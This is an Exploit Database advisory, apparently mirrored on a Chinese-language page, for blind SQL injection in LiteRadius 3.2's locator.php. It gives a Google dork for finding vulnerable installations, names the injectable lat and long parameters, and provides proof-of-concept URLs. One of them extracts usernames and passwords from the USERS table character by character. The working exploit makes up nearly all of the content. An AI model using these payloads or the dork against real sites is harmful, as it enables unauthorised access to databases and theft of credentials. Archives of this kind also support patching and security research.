LiteRadius 3.2 – Multiple Blind SQL Injections

• Exploit Database
• 11 阅读

• 作者： Robert Cooper
  日期： 2011-07-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17528/

• # Exploit Title: LiteRadius <= 3.2 - Multiple Blind SQL Injection vulnerabilities
  # Google Dork: allinurl: locator.php?long=
  # Date: 7/12/2011
  # Author: Robert Cooper (admin[at]websiteauditing.org)
  # Software Link: http://www.escaperadius.com/er/products/literadius/lr.php
  # Tested on: [Linux/Windows 7]
  #Vulnerable Parameters: lat=, long=
  
  ##############################################################
  PoC:
  
  http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334'
  http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334 and ascii(substring((SELECT concat(username,0x3a,password,0x3a,0x0a) FROM USERS limit 0,1),1,1))>80
  
  
  ##############################################################
  www.websiteauditing.org
  www.areyousecure.net
  
  # Shouts to the Belegit crew